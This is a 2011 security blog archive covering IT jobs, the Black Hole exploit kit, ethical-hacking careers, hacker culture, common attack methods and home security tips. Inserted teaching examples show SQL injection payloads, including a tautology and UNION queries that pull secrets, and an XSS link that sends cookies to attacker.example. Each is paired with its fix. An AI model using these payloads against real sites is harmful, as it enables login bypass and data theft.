Wednesday, December 7, 2011

6 Hot IT Jobs That Will Pay Well in 2012

Added on Dec 02, 2011 by Meridith Levinson, CIO.com

Despite ominous predictions about how cloud computing will eviscerate IT departments, 2012 is shaping up to be a great year for IT careers. Cloud computing is in fact creating new roles for IT professionals, while the proliferation of smartphones and tablets has ignited demand for software developers. The IT job market, which experienced a strong rebound in 2011 after the recession, is expected to burn even brighter in 2012, despite global economic challenges, according to IT staffing industry executives.

"I expect it to be better and not just a little bit better," says Tammy Browning, senior vice president of Yoh staffing's western region. "I would say it will be 10 to 15 percent better than 2011 in terms of hiring."

Indeed, Jerry Irvine, CIO of Chicago-based IT outsourcer Prescient Solutions, says he has hired 30 people so far in 2011 and plans to add another 30 to 40 next year. Currently, he has 13 open positions for senior project managers, SharePoint programmers, infrastructure engineers, systems engineers and ITIL helpdesk technicians.

Aggressive hiring is good news for the many IT professionals seeking new jobs. According to the latest IT Employee Confidence Index from staffing firm Technisource, 32 percent of 257 employed IT professionals plan to look for a new job.

IT staffing experts also anticipate that IT salaries will finally spike after years of stagnation, as employers realize they need to pay premiums for certain IT skills in a competitive job market.

"Tech salaries have been flat for a number of years," says Alice Hill, managing director of IT job site Dice.com. Hiring managers have tried their best to poach good people from competitors, she says, but now they're going to have to increase pay to compete on the staffing front.

Shane Bernstein, managing director of Los Angeles-based IT staffing firm Q, concurs: "Salaries and [contract] rates will be higher [in 2012] because the economy seems to be getting better in the tech sector. More companies are hiring. The supply of talent is extremely low and the demand for talent is extremely high."

Want more good news? The job opportunities and earning potential aren't centered solely in Silicon Valley. Across the country, from New Hope, Penn. to Scottsdale, Ariz., companies are vying for IT talent, adds Hill.

Here are the six IT jobs that staffing experts say will be in greatest demand and will command the highest salaries in 2012. The best part: Many of these jobs are also serious fun.

1. Mobile Application Developers

IT professionals who can develop applications for mobile devices are hands down the hottest commodity in IT these days. IT staffing experts agree that this group will remain in this enviable position through 2012, as companies race to adapt their Websites and apps for smartphones and tablets.

Demand for mobile application developers is obvious on Dice.com, where job postings for Android and iPhone developers are up 129 and 190 percent, respectively, over last year, according to Hill.

The technology division of staffing firm Robert Half International projects starting salaries for mobile application developers to increase 9.1 percent in 2012, to a range of $85,000 to $122,500 per year.

Yoh's Browning says salaries for mobile game developers range from $110,000 to $140,000 per year, but, she notes, they tend to prefer to work as free agents. "On average, an Android developer can demand $70 per hour to $100 per hour on a contract," she says.

Adds Hill, "It's never a bad time to be a software developer, especially right now, and if you're a mobile software developer, it's your year."

2. Software Developers

Programmers writing PC-based applications should not feel slighted by their mobile counterparts. Companies need their share of Java, .NET, C#, SharePoint, and Web application developers. Yoh's Browning says Java is hot because it's an open platform that speaks to any back-end system, so large organizations use it to transfer data from legacy systems. Consequently, the salary range for Java developers runs from $60,000 to $150,000 per year, depending on experience. The average contract rate for Java developers is $90 per hour. Base salaries for Web developers range from $61,250 to $99,250 per year, according to Robert Half.

3. User Experience Designers

Because so many of the apps companies are developing--whether for PCs or mobile devices--are customer facing, they need user interface or user experience designers to ensure the apps are fun and intuitive to use. Robert Half anticipates starting salaries for user experience designers to rise 6.7 percent, to between $71,750 and $104,000 per year.

4. IT Security Professionals

As security threats from Duqu to data breaches mount, organizations need IT professionals who can fend off malware makers and cyber thieves. Hill says job ads on Dice.com for various "cyber security" professionals increased a whopping 141 percent in 2011 over the prior year.

Organizations' shift to cloud computing is also spurring the need for infrastructure security professionals, says Prescient Solutions' Irvine. "By putting applications in the cloud, companies have more Internet paths," he says. "They have to have a more secure environment to control entrances and exits to and from their environment."

Irvine also anticipates application security specialists--people who run application scanners through individual Web pages in search of vulnerabilities--will have a good year for finding jobs in 2012.

Robert Half expects base salaries for data security analysts to rise six percent, to a range of $89,000 to $121,500 per year.

5. Data Warehouse Architects, Analysts and Developers

Companies' desire to extract insights from the petabytes of data streaming into their back office systems is driving demand for data warehouse architects, analysts and developers. Q's Bernstein says companies will be making a big push in 2012 to clean and organize their data so that they can better mine it.

Robert Half expects base salaries for data warehouse analysts to climb 6.7 percent, to a range of $88,000 to $119,000 per year in 2012. According to Q, data warehouse developers command average salaries in the range of $120,000 to $135,000 per year or contract rates ranging from $65 to $85 per hour. Data warehouse architects can earn $130,000 to $160,000 per year or $80 (or more, depending on experience) per hour on contract, also according to Q.

6. Infrastructure Professionals

Cloud computing has yet to eliminate IT infrastructure jobs. Now and through 2012, cloud computing--and Windows 7 migrations--are creating demand for network engineers and systems administrators.

Dice.com's Hill says companies are seeking IT professionals who can set up and manage virtual server and virtual storage environments, who can identify which applications are used the most, and who know how to reallocate hard drive storage among those various applications.

The move to Windows 7 is necessitating infrastructure upgrades for some companies, while others eye opportunities to consolidate their data centers and move applications to the cloud, says Sean Ebner, vice president of strategic accounts for Technisource. In the short term, IT departments need infrastructure professionals who can help them plan and execute upgrades and consolidation initiatives, he says.

Network engineers should see their salaries rise 5.8 percent due to increased demand in 2012, to a range of $75,000 to $107,750 per year, according to Robert Half.

"The demand for this talent is so high right now," says Yoh's Browning of these hot IT jobs. "Hiring managers need to move quickly and waste no time putting offers out. There are bidding wars right now for this talent."

Saturday, August 6, 2011

Black Hole Exploit Kit - A Deadly Russian Crimeware

Russian hackers have a long history of malware development; in fact, Russian groups currently operate some of the world's most dangerous malware. One of the most dangerous and popular of these is the "Black Hole Exploit Kit". Black Hole is essentially a collection of browser exploits that take advantage of vulnerabilities in the user's browser in order to infect the computer.

How Does It Work?

Whenever a user visits a seemingly clean website, the malicious iframe planted on it redirects the user to the Black Hole exploit server, which then fires all of its well-known exploits at the victim's browser and gives the attacker remote access.

Cost

The annual license for the Black Hole exploit kit costs around $1500, the semi-annual license costs $700 and the quarterly license costs $700. The author also offers the option to rent the exploit kit, and you can host the exploit kit on the author's server for a small fee.

Wednesday, July 27, 2011

The Hindu : FEATURES / OPPORTUNITIES

Licence to Hack

Payal Chanania

Information theft has reached terrifying proportions - computer-savvy criminals maliciously attack network security systems and steal confidential information, intercept data transfer, hack email accounts, spread viruses and even commit identity theft. All that hackers need is an infinitesimal loophole to breach the most secure corporate, bank or even government website to wreak mischief, damage or even sabotage.

Now shrewd companies are playing these devious experts at their own game by employing 'ethical hackers' to actually attack their own computer networks! Yes, these 'white hats' are actually paid to attempt to penetrate or crash the security system in a bid to detect potential vulnerabilities and suggest changes to increase the safety. This pre-emptive measure tests the effectiveness and quality of the network systems and prevents intrusions before they occur.

The term hacker does carry negative connotations, but it proffers a legitimate occupation for computer experts to keep the bad guys out. They use the same techniques and tactics to breach security protocols as their shadier counterparts, but from an ethical standpoint.

This niche job extends unique and interesting functions like quantitatively assessing and evaluating current weaknesses, threats and flaws that can compromise the network security and designing impenetrable systems to keep the information as secure as possible.

Career wise: Ethical hacking (or penetration testing, intrusion testing, red teaming) is a bright and lucrative career option as large companies are beginning to maintain their own teams of ethical hackers.

A survey by the International Data Corp states that the worldwide demand for information security professionals is 60,000 and companies such as Wipro, Infosys, IBM, Airtel and Reliance are always looking for good ethical hackers.

Scope: You can work as an information security specialist/consultant with security firms or as a full-time company employee; freelancers are not as preferred by established companies in India. Ethical hacking opens the doors to a multitude of IT-based entry-level job positions like Network Security Administrator, Network Defence Analyst, Network Defence Infrastructure Support, Web Security Administrator, Server Administrator, Application Security Tester, Ethical Hacker/Penetration Tester and Security Auditor. Else, you can opt for secure programming, cryptography or forensics.

The job role can extend from authorised hacking to network security surveillance, security tools installation and maintenance, application testing, wireless LAN assessment. There is immense scope for career growth and progression up the ladder – a Network Security Administrator of today can move on to NS Manager, then NS Officer and even become the Chief Information Security Officer in the future.

Similarly, the career graph of an Application Security Tester rises through AS Developer, AS Manager before Chief Application Security Officer. Security Certified Programmers can also progress to Security Project Managers.

Remuneration: In India, pay packages start from Rs.3-6 lakhs per annum and can even go up to Rs.30 lakhs depending on background, experience and job function. Top employers are Wipro, Accenture, IBM, Dell, Google, Cap Gemini, etc. with employment opportunities primarily in Bangalore, Hyderabad, Mumbai, Pune and Chennai.

Ankit Fadia, a renowned computer security expert observes, “Currently there is a huge gap between the demand and supply. Because of this shortage, pay packages and growth opportunities are superlative and ever-growing.” According to K.K. Mookhney, founder and principal consultant of NIIC consulting, “Salaries for information security professionals are at least 20-30% higher than for most other positions at the same level in other fields of IT.”

Skills: The field is open to bright computer science graduates, skilled computer experts or even malicious hackers looking to reform! It is important to have talent, affinity and passion for computers. Excellent programming and networking skills and a college-level background in IT are helpful.

A creative streak will enable you to think out-of-the-box and visualise/create different ways to breach the most secure of systems.

Honesty, integrity and trustworthiness are a must as you will be privy to important (maybe even highly sensitive) information. Safeguarding the privacy and confidentiality of the client/user information is highly imperative.

Rigid background checks and security clearance are essential for government work. According to Mookhney, "A good information security professional should have a thirst for knowledge, be able to grasp new concepts quickly, work hard on their own, and have a great love for technology".

Qualifications: You can opt for formal training or learn it on your own through experience. However both government and corporate sectors are more likely to hire ethical hackers with verifiable credentials. You also have to regularly update your knowledge through workshops, seminars, trade magazines and industry conventions to be aware of the latest tools, techniques and technologies.

Some of the most prevalent professional training certifications in India are:

Certified Ethical Hacker (EC-Council)

Certified Hacking Forensic Investigator (EC-Council)

GIAC Certified Penetration Tester (GPEN) offered by SANS

GIAC Certified Intrusion Analyst (GCIA) offered by SANS

The time period varies from a fast-tracked 5 days to 3 months and the course fee is Rs. 10,000 upwards. Both online and offline courses provide intimate knowledge of network security protocols, multiple computer codes and extensive hands-on training for spotting vulnerabilities.

Yet, the risk of prosecution often keeps bright IT enthusiasts from building a career in information security.

Remember that this is authorised access and organisations cover the legal risk by defining the parameters of probing, penetrating and testing in a legally binding contract.

This works as your security blanket too and will protect you from the law provided you strictly abide by the ethical codes. Also, be aware of the laws and penalties for unauthorised hacking and never begin any hacking activities until you have a signed legal document giving you express permission. So get set to join the online cops' brigade with a licence to hack!

Payal Chanania

faqs@cnkonline.com

Institutes

Appin Knowledge Solutions

http://www.appinonline.com/acse.php

Wednesday, July 20, 2011

Is it possible to pass SQL queries directly to a database that is hidden behind a firewall and any other security mechanism?

Since your website needs to be public, security mechanisms will allow public web traffic to communicate with your web application(s) (generally over port 80/443). The web application has open access to the database in order to return (or update) the requested (or changed) information.
Firewalls and similar intrusion detection mechanisms provide little or no defence against full-scale SQL injection web attacks.
In SQL injection, the hacker uses SQL queries and creativity to get to the database of sensitive corporate data through the web application.
SQL, or Structured Query Language, is the computer language that allows you to store, manipulate, and retrieve data stored in a relational database (a collection of tables which organise and structure data). SQL is, in fact, the only way that a web application (and its users) can interact with the database. Examples of relational databases include Oracle, Microsoft Access, MS SQL Server, MySQL, and FileMaker Pro, all of which use SQL as their basic building block.
SQL commands include SELECT, INSERT, DELETE and DROP TABLE. DROP TABLE is as ominous as it sounds and will in fact eliminate the table with a particular name.
In the legitimate scenario of the login page example above, the SQL commands planned for the web application may look like the following:
SELECT count(*)
FROM users_list_table
WHERE username='FIELD_USERNAME'
AND password='FIELD_PASSWORD'
In plain English, this SQL command (from the web application) instructs the database to match the username and password input by the legitimate user to the combination it has already stored.
Each type of web application is hard-coded with specific SQL queries that it will execute when performing its legitimate functions and communicating with the database. If any input field of the web application is not properly sanitised, a hacker may inject additional SQL commands that broaden the range of SQL commands the web application will execute, thus going beyond the original intended design and function.
A hacker will thus have a clear channel of communication (or, in layman's terms, a tunnel) to the database irrespective of all the intrusion detection systems and network security equipment installed in front of the physical database server.
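The login query above, built two ways, as an added example that is not part of the original post: the first version splices the form fields into the SQL text (the unsanitised case the post describes), the second binds them as parameters. The table, account and inputs are constructed here for an in-memory SQLite database.

```python
"""Added example (not from the original post): the post's login query built
by string concatenation versus with bound parameters, run against a
constructed in-memory SQLite table."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: one legitimate account in users_list_table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users_list_table (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users_list_table VALUES ('alice', 'correct horse')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, field_username: str,
                     field_password: str) -> bool:
    # The query from the post, assembled by concatenation: the field values
    # become part of the SQL text, so a quote in them can change its logic.
    sql = ("SELECT count(*) FROM users_list_table "
           f"WHERE username='{field_username}' AND password='{field_password}'")
    return conn.execute(sql).fetchone()[0] > 0


def login_parameterised(conn: sqlite3.Connection, field_username: str,
                        field_password: str) -> bool:
    # Same query with bound parameters: the database receives the SQL text and
    # the values separately, so the values are only ever compared as data and
    # the sanitisation problem the post describes does not arise.
    sql = ("SELECT count(*) FROM users_list_table "
           "WHERE username=? AND password=?")
    return conn.execute(sql, (field_username, field_password)).fetchone()[0] > 0


def demo() -> dict:
    """Run both versions with a legitimate login, a wrong password, and a
    constructed password field that contains an SQL tautology."""
    conn = make_db()
    injected = "' OR '1'='1"  # constructed input: closes the quote, adds OR
    return {
        "legit_vulnerable": login_vulnerable(conn, "alice", "correct horse"),
        "legit_param": login_parameterised(conn, "alice", "correct horse"),
        "wrong_vulnerable": login_vulnerable(conn, "alice", "wrong"),
        "wrong_param": login_parameterised(conn, "alice", "wrong"),
        # Concatenation: WHERE ... AND password='' OR '1'='1' is always true.
        "injected_vulnerable": login_vulnerable(conn, "alice", injected),
        # Parameters: the same text is just a password that does not match.
        "injected_param": login_parameterised(conn, "alice", injected),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name:22s} login accepted: {ok}")
```

The concatenated query accepts the injected input because the database sees the tautology as part of the WHERE clause, while the parameterised query rejects it; this is the fix to apply at every input field rather than relying on the network perimeter.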

Thursday, June 16, 2011

CIA website hacked

BOSTON: The public website of the Central Intelligence Agency went down evening as the hacker group Lulz Security said it had launched an attack.

Lulz Security has claimed responsibility for recent attacks on the Senate, Sony Corp, News Corp and the US Public Broadcasting System television network.

The CIA site initially could not be accessed from New York to San Francisco, and Bangalore to London. Later in the evening service was sporadic.

"We are looking into these reports," a CIA spokeswoman said.

Lulz Security has defaced websites, posted personal information about customers and site administrators, and disclosed the network configurations of some sites.

Security analysts have downplayed the significance of these attacks, saying the hackers are just looking to show off and get as much attention as possible.

In the case of the CIA attack, hackers would not be able to access sensitive data by breaking into the agency's public website, said Jeffrey Carr, author of the book Inside Cyber Warfare: Mapping the Cyber Underworld.

"All they're doing is saying 'Look how good we are,'" Carr said. "These guys are literally in it for embarrassment, to say 'your security is crap.'"

Lulz only made claims that it attacked www.cia.gov, and there was no evidence on Wednesday evening that sensitive data in the agency's internal computer network had been compromised.

There also were no apparent links to more serious network security breaches recently at the International Monetary Fund and Lockheed Martin Corp. Lulz Security has not been linked to those incidents.

Lulz, whose members are strewn across the globe, announced the attack shortly before 6 p.m. East Coast time.

"Tango down," the group Tweeted, pointing to www.cia.gov.

Although the group, also known as Lulz Boat, fashions itself more as pranksters and activists than people with sinister intent, its members have been accused of breaking the law and are wanted by the FBI and other law enforcement agencies.

Lulz broke into a public website of the Senate over the weekend and released data stolen from the legislative body's computer servers.

In May, the group posted a fake story on the PBS website saying that rapper Tupac Shakur was still alive and living in New Zealand. Shakur was murdered in 1996.

Friday, June 3, 2011

Hacker’s Attitude

There is a community, a shared culture, of expert programmers and networking wizards that traces its history back through decades to the first time-sharing minicomputers and the earliest Arpanet experiments. The members of this culture originated the term `hacker'. Hackers built the Internet. Hackers made the UNIX operating system what it is today. Hackers run Usenet. Hackers make the World Wide Web work. If you are part of this culture and have contributed to it, you're a hacker.

There is another group of people who loudly call themselves hackers, but aren't. These are people who get a kick out of breaking into computers and phreaking the phone system. Real hackers call these people `crackers' and want nothing to do with them. Real hackers mostly think crackers are lazy, irresponsible, and not very bright, and object that being able to break security doesn't make you a hacker. Unfortunately, many journalists and writers have been fooled into using the word `hacker' to describe crackers; this irritates real hackers.

The basic difference is this: hackers build things, crackers break them.

Hacker’s Attitude

Hackers solve problems and build things, and they believe in freedom and voluntary mutual help. To be accepted as a hacker, you have to behave as though you have this kind of attitude yourself.

If you want to be a hacker, repeat the following things until you believe them:

1. The world is full of fascinating problems waiting to be solved.

To be a hacker you have to get a basic thrill from solving problems, sharpening your skills, and exercising your intelligence.

2. Nobody should ever have to solve a problem twice.

Creative brains are a valuable, limited resource. They shouldn't be wasted on re-inventing the wheel when there are so many fascinating new problems waiting out there.

To behave like a hacker, you have to believe that the thinking time of other hackers is precious -- so much so that it's almost a moral duty for you to share information, solve problems and then give the solutions away just so other hackers can solve new problems instead of having to perpetually re-address old ones.

3. Boredom and drudgery are evil.

Hackers (and creative people in general) should never be bored or have to drudge at stupid repetitive work, because when this happens it means they aren't doing what only they can do -- solve new problems. This wastefulness hurts everybody.

To behave like a hacker, you have to believe this enough to want to automate away the boring bits as much as possible, not just for yourself but for everybody else.

4. If you don't have functional English, learn it.

5. Attitude is no substitute for competence.

To be a hacker, you have to develop some of these attitudes. But copping an attitude alone won't make you a hacker; becoming a hacker will take intelligence, practice, dedication, and hard work. Competence at demanding skills that involve mental acuteness, craft, and concentration is best.

Hackers need to be able to both reason logically and step outside the apparent logic of a problem at a moment's notice.

To be a hacker you need motivation and initiative and the ability to educate yourself. So start now...

FAQs:

Will you teach me how to hack?

Hacking is an attitude and skill you basically have to teach yourself. You'll find that while real hackers want to help you, they won't respect you if you beg to be spoon-fed everything they know.

Learn a few things first. Show that you're trying, that you're capable of learning on your own. Then go to the hackers you meet with questions.

What language should I learn first, if I have to?

It depends….

Perl, Python, C and C++ are some of the popular programming languages used by the hackers.

Tuesday, May 24, 2011

The most common methods used by Hackers

The most common methods used by intruders to gain control of home
computers are briefly described below.

1. Trojan horse programs

Trojan horse programs are a common way for intruders to trick you
(sometimes referred to as "social engineering") into installing "back
door" programs. These can allow intruders easy access to your
computer without your knowledge, change your system configurations,
or infect your computer with a computer virus.

2. Back door and remote administration programs

On Windows computers, three tools commonly used by intruders to
gain remote access to your computer are BackOrifice, Netbus, and
SubSeven. These back door or remote administration programs, once
installed, allow other people to access and control your computer.

3. Denial of service

Another form of attack is called a denial-of-service (DoS) attack. This
type of attack causes your computer to crash or to become so busy
processing data that you are unable to use it. It is important to note that
in addition to being the target of a DoS attack, it is possible for your
computer to be used as a participant in a denial-of-service attack on
another system.

4. Being an intermediary for another attack

Intruders will frequently use compromised computers as launching
pads for attacking other systems. An example of this is how distributed
denial-of-service (DDoS) tools are used. The intruders install
an "agent" (frequently through a Trojan horse program) that runs on
the compromised computer awaiting further instructions. Then, when a
number of agents are running on different computers, a single "handler"
can instruct all of them to launch a denial-of-service attack on another
system. Thus, the end target of the attack is not your own computer,
but someone else's -- your computer is just a convenient tool in a larger
attack.

5. Unprotected Windows shares

Unprotected Windows networking shares can be exploited by intruders
in an automated way to place tools on large numbers of Windows-
based computers attached to the Internet. Because site security on the
Internet is interdependent, a compromised computer not only creates
problems for the computer's owner, but it is also a threat to other sites
on the Internet. The greater immediate risk to the Internet community
is the potentially large number of computers attached to the Internet
with unprotected Windows networking shares combined with distributed
attack tools.
Another threat includes malicious and destructive code, such as viruses
or worms, which leverage unprotected Windows networking shares to
propagate.
There is great potential for the emergence of other intruder tools that
leverage unprotected Windows networking shares on a widespread
basis.

6. Mobile code (Java/JavaScript/ActiveX)

There have been reports of problems with "mobile code" (e.g. Java,
JavaScript, and ActiveX). These are programming languages that
let web developers write code that is executed by your web browser.
Although the code is generally useful, it can be used by intruders
to gather information (such as which web sites you visit) or to run
malicious code on your computer. It is possible to disable Java,
JavaScript, and ActiveX in your web browser.

7. Cross-site scripting

A malicious web developer may attach a script to something sent to a
web site, such as a URL, an element in a form, or a database inquiry.
Later, when the web site responds to you, the malicious script is
transferred to your browser.
You can potentially expose your web browser to malicious scripts by:

a. following links in web pages, email messages, or newsgroup postings
without knowing what they link to
b. using interactive forms on an untrustworthy site
c. viewing online discussion groups, forums, or other dynamically
generated pages where users can post text containing HTML tags

8. Packet sniffing

A packet sniffer is a program that captures data from information
packets as they travel over the network. That data may include
user names, passwords, and proprietary information that travels
over the network in clear text. With perhaps hundreds or thousands
of passwords captured by the packet sniffer, intruders can launch
widespread attacks on systems. Installing a packet sniffer does not
necessarily require administrator-level access.
Relative to DSL and traditional dial-up users, cable modem users have
a higher risk of exposure to packet sniffers since entire neighborhoods
of cable modem users are effectively part of the same LAN. A packet
sniffer installed on any cable modem user's computer in a neighborhood
may be able to capture data transmitted by any other cable modem in
the same neighborhood.

Sunday, May 15, 2011

The methods to ensure Internet security

1. Use a firewall
We strongly recommend the use of some type of firewall product for Internet security, such as a network appliance or a personal firewall software package. Intruders are constantly scanning home user systems for known vulnerabilities. Network firewalls (whether software or hardware-based) can provide some degree of protection against these attacks.

2. Don't open unknown email attachments
Before opening any email attachments, be sure you know the source of the attachment. It is not enough that the mail originated from an address you recognize. The Melissa virus spread precisely because it originated from a familiar address. Malicious code might be distributed in amusing or enticing programs.
If you must open an attachment before you can verify the source, we suggest the following procedure:

a. save the file to your hard disk
b. scan the file using your antivirus software
c. open the file

For additional protection, you can disconnect or lock your computer's network connection before opening the file.
Following these steps will reduce, but not wholly eliminate, the chance that any malicious code contained in the attachment might spread from your computer to others.

3. Don't run programs of unknown origin
Never run a program unless you know it to be authored by a person or company that you trust. Also, don't send programs of unknown origin to your friends or coworkers simply because they are amusing -- they might contain a Trojan horse program. These programs seriously hurt Internet Security.

4. Disable hidden filename extensions
Windows operating systems contain an option to "Hide file extensions for known file types". The option is enabled by default, but you can disable this option in order to have file extensions displayed by Windows. After disabling this option, there are still some file extensions that, by default, will continue to remain hidden.
There is a registry value which, if set, will cause Windows to hide certain file extensions regardless of user configuration choices elsewhere in the operating system. The "NeverShowExt" registry value is used to hide the extensions for basic Windows file types. For example, the ".LNK" extension associated with Windows shortcuts remains hidden even after a user has turned off the option to hide extensions.

5. Keep all applications, including your operating system, patched
Vendors will usually release patches for their software when a vulnerability has been discovered. Most product documentation offers a method to get updates and patches. You should be able to obtain updates from the vendor's web site. Read the manuals or browse the vendor's web site for more information.
Some applications will automatically check for available updates, and many vendors offer automatic notification of updates via a mailing list. Look on your vendor's web site for information about automatic notification. If no mailing list or other automated notification mechanism is offered you may need to check periodically for updates.

6. Turn off your computer or disconnect from the network when not in use
Turn off your computer or disconnect its Ethernet interface when you are not using it. An intruder cannot attack your computer if it is powered off or otherwise completely disconnected from the network.

7. Disable Java, JavaScript, and ActiveX if possible
Be aware of the risks involved in the use of "mobile code" such as ActiveX, Java, and JavaScript. An attacker can embed a script in data sent to a web site, such as a URL, an element in a form, or a database query. If the site echoes that data back without filtering or escaping it, the malicious script is delivered to your browser in the site's response and runs as if it were part of the site.
The most significant impact of this vulnerability can be avoided by disabling all scripting languages in the browser. Turning off these options will keep you from being vulnerable to malicious scripts, but it will limit the interaction you can have with some web sites: many legitimate sites use scripts running within the browser to add useful features, and disabling scripting may degrade the functionality of those sites.

8. Disable scripting features in email programs
Because many email programs use the same code as web browsers to display HTML, vulnerabilities that affect ActiveX, Java, and JavaScript often apply to email as well as to web pages. Therefore, in addition to disabling scripting features in web browsers, we recommend that users also disable these features in their email programs.
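To make the mechanism in items 7 and 8 concrete, here is an added example (not code from the original page) of a search page that reflects a request parameter back to the visitor. The site name, page template and attack link are constructed; the attacker's payload is the cookie-stealing script such links typically carry. Whether the response arrives in a browser or in an email client that renders HTML with the same engine, the script in the unescaped response is what gets executed; the escaped version shows the server-side fix, while the advice in the text (disabling scripting) stops execution on the client regardless.

```python
"""Reflected script injection: a site that echoes request data back unescaped
delivers an attacker's script to the victim's browser.  Added example, not
code from the original page; the URL, template and payload are constructed."""
from html import escape
from urllib.parse import parse_qs, urlsplit

# Page template of a hypothetical search endpoint.
TEMPLATE = "<html><body><h1>Search</h1><p>No results for: {term}</p></body></html>"

# Link an attacker would mail or post; q= decodes to
#   <script>new Image().src="http://attacker.example/?c="+document.cookie</script>
ATTACK_URL = (
    "http://shop.example/search?q="
    "%3Cscript%3Enew%20Image().src%3D%22http%3A%2F%2Fattacker.example%2F%3Fc%3D%22"
    "%2Bdocument.cookie%3C%2Fscript%3E"
)


def search_term(url):
    """Recover the q parameter the way the server sees it (percent-decoded)."""
    return parse_qs(urlsplit(url).query).get("q", [""])[0]


def render_unsafe(url):
    """Vulnerable: the visitor-supplied term is placed into the page verbatim,
    so any markup in it becomes part of the response the browser executes."""
    return TEMPLATE.format(term=search_term(url))


def render_safe(url):
    """Hardened: HTML-escape the term, so < > & " ' become entities and the
    browser renders the payload as text instead of running it."""
    return TEMPLATE.format(term=escape(search_term(url), quote=True))


def carries_script(page):
    """Detection used for the demonstration: is there a <script> element in
    the response body?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    print("decoded term :", search_term(ATTACK_URL))
    unsafe = render_unsafe(ATTACK_URL)
    safe = render_safe(ATTACK_URL)
    print("unsafe       :", unsafe, "->", carries_script(unsafe))
    print("escaped      :", safe, "->", carries_script(safe))
```

The decoded term is the same in both cases; the only difference is whether the server treats it as markup or as text. Note that the script runs with the origin of shop.example, not attacker.example, which is why it can read that site's cookie.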

9. Make regular backups of critical data
Keep a copy of important files on removable media such as ZIP disks or recordable CD-ROM disks (CD-R or CD-RW disks). Use software backup tools if available, and store the backup disks somewhere away from the computer.

10. Make a boot disk in case your computer is damaged or compromised
To aid in recovering from a security breach or hard disk failure, create a boot disk on a floppy disk; it will help when recovering the computer after such an event. Remember, however, that you must create this disk before you have a security event, because a compromised or damaged system can no longer be trusted to produce one.

11. Consult your system support personnel if you work from home
If you use your broadband access to connect to your employer's network via a Virtual Private Network (VPN) or other means, your employer may have policies or procedures relating to the security of your home network. Be sure to consult with your employer's support personnel, as appropriate, before following any of the steps outlined in this document.

Tuesday, May 10, 2011

Can I Become A Good Hacker Without A Prior Knowledge Of Programming??

"Can I become a good hacker without knowing programming?" and "Is programming necessary for learning how to hack?" are questions I get asked almost daily. There have been lots of debates on this topic: some think that it's necessary, while others think that it's not necessary at all. So I thought I would write a post explaining my views on whether programming is necessary for becoming a hacker or not.

The answer is that it depends:

Why it's not necessary?

In the early 90s the best hackers were known as those with the best knowledge of programming, probably because almost everything was based on a command line, so it was certain that if someone was a good hacker he was surely a good programmer.

However, the definition of a hacker sort of changed after the beginning of the 21st century. One could become a fairly good hacker without any knowledge of programming. The reason for that is that nowadays there are lots of ready-made tools which help you compromise a machine without any knowledge of programming. Take the example of "Havij": Havij is a small piece of software which automates the process of SQL injection and helps you extract sensitive database information in seconds, where in some cases it may take hours to extract it by hand. If you still don't agree with me, try answering the following question:

Does it matter if an elite hacker writes a buffer overflow or a script kiddie runs a tool, if the target system gets compromised anyway?
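What a tool like Havij automates is shown below in an added example that is not part of the original post. The in-memory database, its tables, rows and the two payloads are all constructed: a query built by pasting the user's input into the SQL string lets a crafted username first enumerate the schema and then read a table the query was never meant to touch, while the bound-parameter version returns nothing for the same input.

```python
"""What an automated SQL injection tool exploits: a query built by string
concatenation.  Added example, not from the original post; the schema,
rows and payloads are constructed."""
import sqlite3


def make_db():
    """In-memory database standing in for a web application's backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT)")
    conn.executemany("INSERT INTO users (username, email) VALUES (?, ?)",
                     [("alice", "alice@example.test"), ("bob", "bob@example.test")])
    conn.execute("CREATE TABLE api_keys (owner TEXT, secret TEXT)")
    conn.execute("INSERT INTO api_keys VALUES ('alice', 'sk-constructed-example-key')")
    conn.commit()
    return conn


def lookup_unsafe(conn, username):
    """Vulnerable: the attacker's string becomes part of the SQL statement."""
    sql = f"SELECT username, email FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, username):
    """Fixed: a bound parameter is always data, never SQL."""
    sql = "SELECT username, email FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


# Payloads of the kind an injection tool generates and refines automatically.
# The closing quote ends the intended string, UNION appends attacker-chosen
# rows with the same column count, and "--" comments out the original quote.
SCHEMA_PAYLOAD = "x' UNION SELECT name, sql FROM sqlite_master --"
SECRETS_PAYLOAD = "x' UNION SELECT owner, secret FROM api_keys --"


def tables_via_injection(conn):
    """Step one of an automated attack: enumerate the schema."""
    return sorted(name for name, _ in lookup_unsafe(conn, SCHEMA_PAYLOAD))


def secrets_via_injection(conn):
    """Step two: pull rows from a table the query was never meant to touch."""
    return lookup_unsafe(conn, SECRETS_PAYLOAD)


def run_demo():
    """Run both queries against the same payloads and return the results."""
    conn = make_db()
    return {
        "tables": tables_via_injection(conn),
        "secrets": secrets_via_injection(conn),
        "safe_with_payload": lookup_safe(conn, SECRETS_PAYLOAD),
        "safe_normal": lookup_safe(conn, "alice"),
    }


if __name__ == "__main__":
    for label, rows in run_demo().items():
        print(f"{label:18}: {rows}")
```

The point of the example is the one the post makes: none of this requires writing the exploit yourself, because the payload shapes are mechanical enough for a tool to try them. Understanding why the parameterised query is immune is where the programming knowledge comes in.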


Where It's Necessary?

It's true that many good hackers are technology buffs who are curious about how things work, and this is where you need prior knowledge of programming in order to understand how things work.

Another reason why you should probably learn programming is that you can write your own exploit (an exploit is a piece of code which can be used to gain access to the target machine using a specific vulnerability), which is the single most important thing that will separate you from the rest of the script kiddies out there. Also, some published exploit codes come with several deliberate mistakes, left in by elite hackers themselves to prevent script kiddies, or people with very little knowledge of hacking, from running them.

In Short:

You can become a fairly good hacker without prior knowledge of programming, but if you want to take your hacking skills to the next level I recommend that you learn programming. The question which might now arise in your mind is which programming languages you should learn; I will cover that in my upcoming posts.

Feel free to express your views on the topic, whether you agree with me or not.